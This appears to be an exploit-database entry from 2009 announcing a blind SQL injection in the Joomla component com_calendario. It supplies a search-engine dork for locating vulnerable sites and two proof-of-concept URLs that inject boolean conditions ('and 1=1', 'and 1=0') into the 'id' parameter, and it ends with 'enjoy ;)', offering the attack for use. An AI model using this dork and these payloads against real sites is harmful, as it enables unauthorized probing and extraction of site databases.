id: 10475
date: 12/28/2009
title: Joomla Component com_calendario Blind SQL injection Vulnerability
author: Mr.tro0oqy
cves: 

=================================================================
Joomla Component com_calendario Blind SQL injection Vulnerability
=================================================================

dork: inurl:index.php?option=com_calendario
 
 
exp :
 
http://www.target.com/index.php?option=com_calendario&task=detalhes&Itemid=88&id=297+and+1=1 true
 
 
http://www.target.com/index.php?option=com_calendario&task=detalhes&Itemid=88&id=297+and+1=0 false
 
 
enjoy ;)



#  0day.today [2023-03-25]  #